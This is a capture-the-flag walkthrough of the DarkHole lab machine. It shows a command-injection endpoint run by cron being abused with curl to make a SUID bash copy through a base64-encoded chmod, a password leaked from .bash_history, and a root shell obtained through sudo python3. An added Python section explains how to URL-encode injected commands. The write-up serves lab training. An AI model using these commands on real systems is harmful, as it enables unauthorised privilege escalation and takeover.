Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-81-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 28 May 2023 10:39:13 AM UTC

  System load:  0.18               Processes:                198
  Usage of /:   52.1% of 12.73GB   Users logged in:          0
  Memory usage: 19%                IPv4 address for enp0s17: 192.168.1.169
  Swap usage:   0%

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Sep  3 05:49:05 2021 from 192.168.135.128
jehad@darkhole:~$ 

User flag

jehad@darkhole:/home/losy$ cat user.txt 
NULLLLLLLLLLLLLLLLLLLLLLLLLLLLLL

3: Privilege escalation

linpeas.sh turns up a cron job:

* * * * * losy  cd /opt/web && php -S localhost:9999

It runs every minute as losy and serves /opt/web on localhost:9999 with PHP's built-in server. Whatever arrives in the cmd parameter is executed as losy (see below), so the plan is to copy /bin/bash and set the SUID bit on the copy to get losy's privileges.

jehad@darkhole:~$ curl "http://127.0.0.1:9999"
Parameter GET['cmd']jehad@darkhole:~$ curl "http://127.0.0.1:9999?cmd=id;whoami"
Parameter GET['cmd']uid=1002(losy) gid=1002(losy) groups=1002(losy)
losy
losyjehad@darkhole:~$ 

A literal + in a query string is decoded by the server as a space (it could be sent as %2B instead; base64-encoding the chmod command sidesteps the problem), so chmod +s is base64-encoded and decoded on the target. The SUID copy is then started with -p so bash keeps the effective uid instead of dropping it:

cp /bin/bash /tmp/bash;echo Y2htb2QgK3MgL3RtcC9iYXNo | base64 -d | bash
// Y2htb2QgK3MgL3RtcC9iYXNo = base64("chmod +s /tmp/bash")
jehad@darkhole:~$ curl "http://127.0.0.1:9999?cmd=cp%20/bin/bash%20/tmp/bash;echo%20Y2htb2QgK3MgL3RtcC9iYXNo%20%7C%20base64%20-d%20%7C%20bash"
Parameter GET['cmd']jehad@darkhole:~$ /tmp/bash -p
bash-5.0$ id
uid=1001(jehad) gid=1001(jehad) euid=1002(losy) egid=1002(losy) groups=1002(losy),1001(jehad)
bash-5.0$ 
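The + problem is a property of query-string decoding, not of the PHP server: $_GET decodes application/x-www-form-urlencoded, so + becomes a space, & starts a new parameter and # never leaves the client. The example below is added and not part of the writeup: server_side_get() simulates that decoding with urllib, and the helpers compare three ways of building the cmd URL: the writeup's (only spaces encoded as %20), full percent-encoding, and the writeup's base64 wrapper. It also covers the case the wrapper does not: base64 output can itself contain +, and the chmod +s command above avoids that only by luck. The localhost:9999 endpoint and the chmod command are from the page; the id>/tmp/out command is a constructed illustration and nothing is sent over the network.

```python
import base64
from urllib.parse import quote, unquote_plus, urlsplit

BASE = "http://127.0.0.1:9999/"


def server_side_get(url):
    """Simulate what PHP puts in $_GET for a request URL: the fragment never
    leaves the client, '&' separates parameters, the first '=' separates key
    from value, and both are decoded as application/x-www-form-urlencoded,
    so '+' becomes a space and %XX becomes a byte."""
    params = {}
    for pair in urlsplit(url).query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote_plus(key)] = unquote_plus(value)
    return params


def writeup_url(cmd):
    """The writeup's style: only spaces encoded as %20, everything else raw."""
    return BASE + "?cmd=" + cmd.replace(" ", "%20")


def encoded_url(cmd):
    """Percent-encode every byte outside the unreserved set ('+' -> %2B,
    '&' -> %26, '#' -> %23, '/' -> %2F), so the command survives intact."""
    return BASE + "?cmd=" + quote(cmd, safe="")


def base64_wrapper(cmd):
    """The writeup's workaround: ship the command base64-encoded and decode it
    on the target. The base64 alphabet itself contains '+' (produced whenever a
    6-bit group is 111110, e.g. '>' as the third byte of a triple), so the
    wrapper still needs encoded_url() in the general case."""
    return "echo %s | base64 -d | bash" % base64.b64encode(cmd.encode()).decode()


def survives(cmd, build_url):
    """True if the server would see exactly `cmd` when the URL is built this way."""
    return server_side_get(build_url(cmd)).get("cmd") == cmd
```

In practice quote(cmd, safe="") (or curl -G --data-urlencode "cmd=...") is the robust choice; the base64 wrapper is still handy when the target's shell mangles quotes, but percent-encode the wrapper too rather than relying on the encoded text happening to contain no +.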

With losy's effective uid, losy's .bash_history is readable, and it contains what looks like a password typed at the shell prompt, losy:gang:

bash-5.0$ cat .bash_history
clear
exit
clear
exit
clear
exit
clear
exit
clear
ls
ls -al
ls -la
clear
exit
clear
exit
clear
exit
clear
cd ~
ls
ls -la
pwd
ssh-keygen -t rsa -b 4096
clear
chmod 777 .ssh/
cd .ssh/
chmod 666 id_rsa
clear
ls -la
clear
cd ..
ls -la
rm .ssh/ 
rm -r .ssh/
clear
ls -la
ssh-kyegen
exit
clear
ls -la
cd /home/losy/
clear
ls -la
rm -r .ssh/
clear
ls -la
pwd
ssh-keygen -t rsa 
ls -la
ssh-keygen -t rsa 
clear
chmod 777 .ssh/
cd .ssh/
chmod 666 id_rsa
php -S localhost:9999
clear
sudo su
su lama
clear
ls -la
cat /etc/crontab 
su lama
mkdir web
ls -la
su lama
ls
touch index.php
cd ..
ls
ls -la
sudo su
c
clear
su lama
clear
su lama
mysql -e '\! /bin/bash'
mysql -u root -p -e '\! /bin/bash'
P0assw0rd losy:gang
clear
sudo -l
sudo python3 -c 'import os; os.system("/bin/sh")'
sudo python -c 'import os; os.system("/bin/sh")'
sudo /usr/bint/python3 -c 'import os; os.system("/bin/sh")'
sudo /usr/bin/python3 -c 'import os; os.system("/bin/sh")'
clear
cd ~
cat .bash_history 
clear
id
clear
ls -al
cd home
cd /home
ls
clear
cd jehad/
ls -la
cd ..
cd losy/
cat .bash_history 
clear
ls -la
ss
cat .bash_history 
clear
password:gang 

With that password, SSH in as losy directly; sudo -l shows /usr/bin/python3 may be run as root, which is all it takes for a root shell and the flag:

$ ssh losy@192.168.1.169
losy@192.168.1.169's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-81-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 28 May 2023 11:07:40 AM UTC

  System load:  0.0                Processes:                208
  Usage of /:   52.2% of 12.73GB   Users logged in:          1
  Memory usage: 27%                IPv4 address for enp0s17: 192.168.1.169
  Swap usage:   0%

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Sep  3 04:09:48 2021 from 192.168.135.128
losy@darkhole:~$ sudo -l
[sudo] password for losy: 
Matching Defaults entries for losy on darkhole:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User losy may run the following commands on darkhole:
    (root) /usr/bin/python3
losy@darkhole:~$ sudo /usr/bin/python3
Python 3.8.10 (default, Jun  2 2021, 10:49:15) 
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.system('/bin/bash')
root@darkhole:/home/losy# id
uid=0(root) gid=0(root) groups=0(root)
root@darkhole:/home/losy# cd /root
root@darkhole:~# ls
root.txt  snap
root@darkhole:~# cat root.txt
NULLLLLLLLLLLLLLLLLLLLLLLLLLLLLL
root@darkhole:~#
Posted on 2023-09-04 17:55 by 丛中人